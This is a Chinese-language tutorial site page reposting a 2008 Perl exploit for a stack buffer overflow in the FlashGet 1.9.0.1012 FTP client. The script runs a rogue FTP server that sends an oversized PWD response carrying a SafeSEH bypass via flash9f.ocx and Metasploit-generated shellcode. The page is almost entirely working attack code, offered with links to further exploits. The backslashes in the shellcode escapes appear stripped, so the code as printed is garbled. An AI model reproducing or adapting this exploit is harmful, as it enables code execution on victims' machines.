首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
当前位置:查字典教程网 >网络安全 >Exploit >FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
摘要:#!/usr/bin/perl#k`sOSe08/17/2008#bypasssafesehusingflash9f.ocx.usewarn...

#!/usr/bin/perl

# k`sOSe 08/17/2008

# bypass safeseh using flash9f.ocx. use warnings;

use strict;

use IO::Socket; # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

my $shellcode =

"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x6b".

"xa3x03x10x83xebxfcxe2xf4x97x4bx47x10x6bxa3x88x55".

"x57x28x7fx15x13xa2xecx9bx24xbbx88x4fx4bxa2xe8x59".

"xe0x97x88x11x85x92xc3x89xc7x27xc3x64x6cx62xc9x1d".

"x6ax61xe8xe4x50xf7x27x14x1ex46x88x4fx4fxa2xe8x76".

"xe0xafx48x9bx34xbfx02xfbxe0xbfx88x11x80x2ax5fx34".

"x6fx60x32xd0x0fx28x43x20xeex63x7bx1cxe0xe3x0fx9b".

"x1bxbfxaex9bx03xabxe8x19xe0x23xb3x10x6bxa3x88x78".

"x57xfcx32xe6x0bxf5x8axe8xe8x63x78x40x03x53x89x14".

"x34xcbx9bxeexe1xadx54xefx8cxc0x62x7cx08xa3x03x10";

my $sock = IO::Socket::INET->new( LocalAddr => '0.0.0.0', LocalPort => '21', Listen => 1, Reuse => 1); while(my $csock = $sock->accept())

{ print $csock "220 Hello ;)rn";

read_sock($csock); print $csock "331 pwd pleasern";

read_sock($csock); print $csock "230 OKrn";

read_sock($csock); print $csock "250 CWD command successful.rn";

read_sock($csock); print $csock "257 " . "x22" .

"x41" x 324 . "xEBx06x90x90" . # jump ahead

"x82x01x02x30" . # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH ;) $shellcode . "x90" x 840 .

"x22" .

" is current directory.rn"; close($csock);

exit;

} sub read_sock

{

my ($sock) = @_; my $buf = <$sock>; print "[client] -> $buf"; }

【FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)】相关文章:

Joomla Component EZ Store Remote Blind SQL Injection Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

上一篇: webEdition CMS (we_objectID) Blind SQL Injection Exploit
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
网络安全子分类
最新Exploit学习
热门Exploit学习